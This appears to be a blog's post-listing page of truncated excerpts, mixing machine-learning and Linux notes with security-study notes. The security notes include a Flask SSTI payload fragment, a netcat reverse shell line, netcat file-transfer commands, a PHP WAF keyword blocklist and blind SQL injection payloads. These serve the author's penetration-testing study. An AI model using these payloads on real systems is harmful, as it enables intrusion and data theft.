摘要: 综述 联邦学习 联邦学习的基本流程 联邦学习的应用 Google文字预测:mobile applications for next word prediction on keyboards [15–18] like Gboard by Google on Android mobile phones, 阅读全文
posted @ 2021-01-12 12:47 TaiiHu 阅读(332) 评论(0) 推荐(0)
摘要: https://github.com/vulhub/vulhub/tree/master/flask/ssti GlobalsAttrCount=0 for a in ().__class__.__base__.__subclasses__(): if hasattr(a.__init__,'__g 阅读全文
posted @ 2021-01-11 20:22 TaiiHu 阅读(191) 评论(3) 推荐(0)
摘要: nc 1.Transferring Files 接收方: nc -lvvp 4444 > recive.file 发送方: nc -vv 10.0.1.1 4444 < send.file 2.Reverse Shell victim: nc -vv 10.0.1.1 4444 -e /bin/ba 阅读全文
posted @ 2021-01-11 16:40 TaiiHu 阅读(228) 评论(0) 推荐(0)
摘要: 4-7 dir(type) output >>> output ['__abstractmethods__', '__base__', '__bases__', '__basicsize__', '__call__', '__class__', '__delattr__', '__dict__', 阅读全文
posted @ 2021-01-06 17:02 TaiiHu 阅读(51) 评论(0) 推荐(0)
摘要: 前提条件 windows insider 版本 Ensure that you install Build version 20145 or higher. You can check your build version number by running winver via the Windo 阅读全文
posted @ 2021-01-06 15:41 TaiiHu 阅读(404) 评论(0) 推荐(0)
摘要: 1 public function waf($s) { if (preg_match_all('/'. implode('|', array( '[' . preg_quote("(*<=>|'&-@") . ']', 'select', 'and', 'or', 'if', 'by', 'from 阅读全文
posted @ 2020-12-24 17:39 TaiiHu 阅读(235) 评论(0) 推荐(0)
摘要: 统计学习方法 第二版 李航 阅读全文
posted @ 2020-12-24 16:22 TaiiHu 阅读(200) 评论(0) 推荐(0)
摘要: SQL注入的分类 基于报错的注入 基于布尔类型的盲注 select length(database()) select ascii(substr(database(), 1, 1)) >= 115 基于时间的盲注 sleep()和benchmark if(ascii(substr(database( 阅读全文
posted @ 2020-04-10 18:22 TaiiHu 阅读(121) 评论(0) 推荐(0)
摘要: mysql >=5.0 1. 用于储存mysql数据库元数据的information_schema库 schemata表存储数据库信息 schema_name字段 存储数据库名 tables表存储表的信息 table_schema 对应的数据库名 table_name 对应的存储表名 columns 阅读全文
posted @ 2020-04-10 17:56 TaiiHu 阅读(121) 评论(0) 推荐(0)
摘要: Bash History !num 重新执行history中的第num条命令 !! 重新执行上一条命令 ctrl+r 在历史中搜索命令 Text Searching grep sed awk cut wc sort Diff File diff and vimdiff 计划任务 一次计划任务:at 阅读全文
posted @ 2020-04-01 21:08 TaiiHu 阅读(111) 评论(0) 推荐(0)